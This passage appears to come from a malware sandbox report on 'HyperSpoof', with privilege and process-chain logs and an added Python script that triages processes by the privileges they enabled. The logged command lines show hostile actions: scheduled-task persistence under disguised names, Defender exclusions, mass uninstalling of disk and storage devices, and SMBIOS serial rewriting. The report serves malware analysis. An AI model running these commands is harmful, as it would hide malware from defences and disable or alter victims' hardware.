Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeLoadDriverPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeLoadDriverPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
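The table above records which privileges each process enabled on its token: SeDebugPrivilege by HyperSpoof.exe and by the powershell.exe it spawned, and repeated SeBackup/SeRestore/SeTakeOwnership/SeImpersonate enablements plus two SeLoadDriver enablements by DevManView.exe. The following is an added example, not the sandbox's code, that aggregates such rows per process and ranks them by what the combination of privileges allows. The weights, the privilege-pair rules and the list of user-writable locations are assumptions of mine and are the knobs to tune for a real environment.

```python
from dataclasses import dataclass, field

DEVMANVIEW = r"C:\ProgramData\Microsoft\Windows\DevManView.exe"
HYPERSPOOF = r"C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe"
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed input: the "Token:" rows of the table above, collapsed to
# (process, privilege) -> number of times the sandbox logged the enablement.
TOKEN_EVENTS = {
    (HYPERSPOOF, "SeDebugPrivilege"): 1,
    (POWERSHELL, "SeDebugPrivilege"): 1,
    (DEVMANVIEW, "SeBackupPrivilege"): 15,
    (DEVMANVIEW, "SeRestorePrivilege"): 15,
    (DEVMANVIEW, "SeTakeOwnershipPrivilege"): 15,
    (DEVMANVIEW, "SeImpersonatePrivilege"): 15,
    (DEVMANVIEW, "SeLoadDriverPrivilege"): 2,
}

# Assumed weights (mine, not the sandbox's): roughly how far a privilege
# lets a process reach beyond its own security context.
WEIGHTS = {
    "SeDebugPrivilege": 5,           # open and write any process: injection, LSASS dumps
    "SeLoadDriverPrivilege": 5,      # load kernel code
    "SeTcbPrivilege": 5,
    "SeCreateTokenPrivilege": 5,
    "SeAssignPrimaryTokenPrivilege": 4,
    "SeTakeOwnershipPrivilege": 3,   # seize any securable object
    "SeRestorePrivilege": 3,         # write any file or registry key regardless of ACL
    "SeBackupPrivilege": 3,          # read any file or registry key regardless of ACL
    "SeImpersonatePrivilege": 2,
}

# Privilege pairs whose combination is worse than the sum of the parts.
COMBOS = {
    frozenset({"SeBackupPrivilege", "SeRestorePrivilege"}):
        "backup+restore: arbitrary read and write of ACL-protected files and hives",
    frozenset({"SeDebugPrivilege", "SeLoadDriverPrivilege"}):
        "debug+loaddriver: both user-mode and kernel-mode code execution paths",
}

# Assumed list of locations a standard user can write to; a binary that
# enables privileges while running from one of them deserves a closer look.
USER_WRITABLE_PREFIXES = (r"c:\programdata", r"c:\users", r"c:\windows\temp")


@dataclass
class Profile:
    process: str
    privileges: dict = field(default_factory=dict)   # privilege -> enable count
    score: int = 0
    notes: list = field(default_factory=list)


def profile_tokens(events):
    """Aggregate AdjustTokenPrivileges rows per process, score the set of
    privileges each one held, and return the profiles highest score first."""
    profiles = {}
    for (process, privilege), count in events.items():
        prof = profiles.get(process)
        if prof is None:
            prof = profiles[process] = Profile(process)
        prof.privileges[privilege] = prof.privileges.get(privilege, 0) + count
    for prof in profiles.values():
        held = set(prof.privileges)
        # Score the distinct set, not the repetitions: 15 SeBackup enablements
        # are not 15 times worse than one.
        prof.score = sum(WEIGHTS.get(p, 1) for p in held)
        for combo, note in COMBOS.items():
            if combo <= held:
                prof.score += 3
                prof.notes.append(note)
        if prof.process.lower().startswith(USER_WRITABLE_PREFIXES):
            prof.score += 2
            prof.notes.append("runs from a user-writable location")
        if held & {"SeDebugPrivilege", "SeLoadDriverPrivilege"}:
            prof.notes.append("can reach other processes or the kernel")
    return sorted(profiles.values(), key=lambda p: p.score, reverse=True)


if __name__ == "__main__":
    for prof in profile_tokens(TOKEN_EVENTS):
        print(f"{prof.score:3} {prof.process}")
        for privilege, count in sorted(prof.privileges.items()):
            print(f"      {privilege} x{count}")
        for note in prof.notes:
            print(f"      ! {note}")
```

On the rows above DevManView.exe ranks first (backup+restore pair, SeLoadDriver, and a ProgramData path), HyperSpoof.exe second (SeDebug from a Temp path) and powershell.exe last. The score is only a triage order: DevManView asks for these privileges whenever it enumerates or disables devices, so what makes it worth chasing here is the context the rest of the report supplies, namely that it was dropped to ProgramData and launched through cmd.exe by HpsrSpoof.exe, rather than the privileges by themselves.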

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1572 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1572 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4708 wrote to memory of 1324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe
PID 4708 wrote to memory of 1324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe
PID 4708 wrote to memory of 2632 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe
PID 4708 wrote to memory of 2632 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe
PID 4708 wrote to memory of 2632 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe
PID 4708 wrote to memory of 1672 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\conhostsft.exe
PID 4708 wrote to memory of 1672 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\conhostsft.exe
PID 4708 wrote to memory of 1672 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\conhostsft.exe
PID 1324 wrote to memory of 3396 N/A C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe C:\Windows\System32\cmd.exe
PID 1324 wrote to memory of 3396 N/A C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe C:\Windows\System32\cmd.exe
PID 2632 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe C:\Windows\SysWOW64\WScript.exe
PID 2632 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe C:\Windows\SysWOW64\WScript.exe
PID 2632 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe C:\Windows\SysWOW64\WScript.exe
PID 3396 wrote to memory of 3456 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\Volumeid64.exe
PID 3396 wrote to memory of 3456 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\Volumeid64.exe
PID 1324 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe C:\Windows\System32\cmd.exe
PID 1324 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe C:\Windows\System32\cmd.exe
PID 1272 wrote to memory of 2444 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1272 wrote to memory of 2444 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1272 wrote to memory of 4424 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1272 wrote to memory of 4424 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1272 wrote to memory of 1276 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1272 wrote to memory of 1276 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1272 wrote to memory of 1912 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1272 wrote to memory of 1912 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1272 wrote to memory of 1156 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1272 wrote to memory of 1156 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1272 wrote to memory of 3084 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1272 wrote to memory of 3084 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1272 wrote to memory of 3424 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1272 wrote to memory of 3424 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1272 wrote to memory of 3732 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1272 wrote to memory of 3732 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1272 wrote to memory of 3140 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\wusa.exe
PID 1272 wrote to memory of 3140 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\wusa.exe
PID 1272 wrote to memory of 1976 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1272 wrote to memory of 1976 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1272 wrote to memory of 1540 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1272 wrote to memory of 1540 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1272 wrote to memory of 1340 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1272 wrote to memory of 1340 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1272 wrote to memory of 2760 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1272 wrote to memory of 2760 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1272 wrote to memory of 4984 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe
PID 1272 wrote to memory of 4984 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe
PID 1272 wrote to memory of 2824 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1272 wrote to memory of 2824 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 2688 wrote to memory of 3256 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\System32\Conhost.exe
PID 2688 wrote to memory of 3256 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\System32\Conhost.exe
PID 2688 wrote to memory of 3256 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\System32\Conhost.exe
PID 3256 wrote to memory of 3556 N/A C:\Windows\SysWOW64\cmd.exe C:\ChainReview\sphyperRuntimedhcpSvc.exe
PID 3256 wrote to memory of 3556 N/A C:\Windows\SysWOW64\cmd.exe C:\ChainReview\sphyperRuntimedhcpSvc.exe
PID 1672 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Roaming\conhostsft.exe C:\Users\Admin\AppData\Roaming\.conhostsft.exe
PID 1672 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Roaming\conhostsft.exe C:\Users\Admin\AppData\Roaming\.conhostsft.exe
PID 1324 wrote to memory of 4676 N/A C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
PID 1324 wrote to memory of 4676 N/A C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
PID 4676 wrote to memory of 3652 N/A C:\Windows\system32\cmd.exe C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
PID 4676 wrote to memory of 3652 N/A C:\Windows\system32\cmd.exe C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
PID 1324 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe C:\Windows\system32\cmd.exe
PID 1324 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe C:\Windows\system32\cmd.exe
PID 1968 wrote to memory of 1984 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Conhost.exe
PID 1968 wrote to memory of 1984 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Conhost.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe

"C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"

C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe

"C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe"

C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe

"C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe"

C:\Users\Admin\AppData\Roaming\conhostsft.exe

"C:\Users\Admin\AppData\Roaming\conhostsft.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: L59I-K5JS

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\ChainReview\4N7V2tIOe7KSQ8eET3YGuCyK2Y.vbe"

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: L59I-K5JS

C:\Users\Admin\AppData\Roaming\.conhostsft.exe

"C:\Users\Admin\AppData\Roaming\.conhostsft.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Disk.bat

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk drive*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "C:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "D:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "E:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "F:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "G:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "disk"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk&*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SWD\WPDBUSENUM*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "USBSTOR*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SCSI\Disk*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "STORAGE*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\ChainReview\8xoM57ln5l3nWVEqwKA0TDOQ0Am35EOuQMtKP.bat" "

C:\ChainReview\sphyperRuntimedhcpSvc.exe

"C:\ChainReview/sphyperRuntimedhcpSvc.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 13740HP-TRGT23541AB

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Program Files\Common Files\DESIGNER\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Common Files\DESIGNER\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Program Files\Common Files\DESIGNER\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 213743HP-TRGT1522RV

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Common Files\SearchApp.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\SearchApp.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Common Files\SearchApp.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 11 /tr "'C:\Windows\ja-JP\fontdrvhost.exe'" /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 813743HP-TRGT1522SG

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\ja-JP\fontdrvhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 10 /tr "'C:\Windows\ja-JP\fontdrvhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Windows\en-US\conhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\en-US\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\Windows\en-US\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 14 /tr "'C:\Program Files\Reference Assemblies\Microsoft\SppExtComObj.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\SppExtComObj.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 7 /tr "'C:\Program Files\Reference Assemblies\Microsoft\SppExtComObj.exe'" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\DESIGNER\csrss.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Common Files\SearchApp.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ja-JP\fontdrvhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\en-US\conhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Reference Assemblies\Microsoft\SppExtComObj.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\KnrOHCCDDZ.bat"

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 513743HP-TRGT1522SL

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 413747HP-TRGT12270FA

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 613747HP-TRGT12270FU

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 313747HP-TRGT12270DQ

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 713747HP-TRGT12270MST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 13766HP-TRGT11225AB

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 213766HP-TRGT11225RV

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 813766HP-TRGT11225SG

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 513766HP-TRGT11225SL

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 413766HP-TRGT11225FA

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

